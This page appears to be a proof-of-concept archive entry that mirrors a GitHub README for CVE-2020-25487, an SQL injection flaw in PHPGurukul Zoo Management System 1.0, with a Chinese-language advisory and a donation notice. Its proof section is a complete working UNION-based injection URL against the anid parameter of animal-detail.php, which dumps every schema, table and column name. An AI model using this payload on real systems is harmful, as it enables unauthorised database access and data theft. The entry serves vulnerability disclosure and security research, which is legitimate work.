CVE-2020-25487 PoC — PHPGURUKUL Zoo Management System SQL注入漏洞

Source

https://github.com/Ko-kn3t/CVE-2020-25487

Associated Vulnerability

Title:PHPGURUKUL Zoo Management System SQL注入漏洞 (CVE-2020-25487)
Description:PHPGURUKUL Zoo Management System是PHPGurukul（Phpgurukul）团队的一个动物园管理系统。 PHPGURUKUL Zoo Management System 1.0版本存在SQL注入漏洞，该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。

Description

SQL injection Vulnerability in Zoo Management System

Readme

# CVE-2020-25487

#SQL injection Vulnerability in Zoo Management System V 1.0

#Vendor - https://phpgurukul.com

#Product - https://phpgurukul.com/zoo-management-system-using-php-and-mysql/

#Vulnerability Type - SQL injection

#Affected Component - zms/animal-detail.php

#Attack Type- Local

#Impact Code execution - true

#Attack Vectors - Go to client webpage and do sql injection at http://<site>/details.php?anid=
  
#Proof :

http://localhost/zms/animal-detail.php?anid=9%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,(select (@a) from(select(@a:=0x00),(select (@a) from(information_schema.columns)wheretable_schema!='information_schema' and(@a)in(@a:=concat(@a,table_schema,' > ',table_name,' >',column_name,'<br>'))))a),NULL,NULL,NULL,NULL--%20-

File Snapshot


 [4.0K]  /data/pocs/2bf6fb8b07b734d9b675bebe286c6217725e47f7
└── [ 752]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!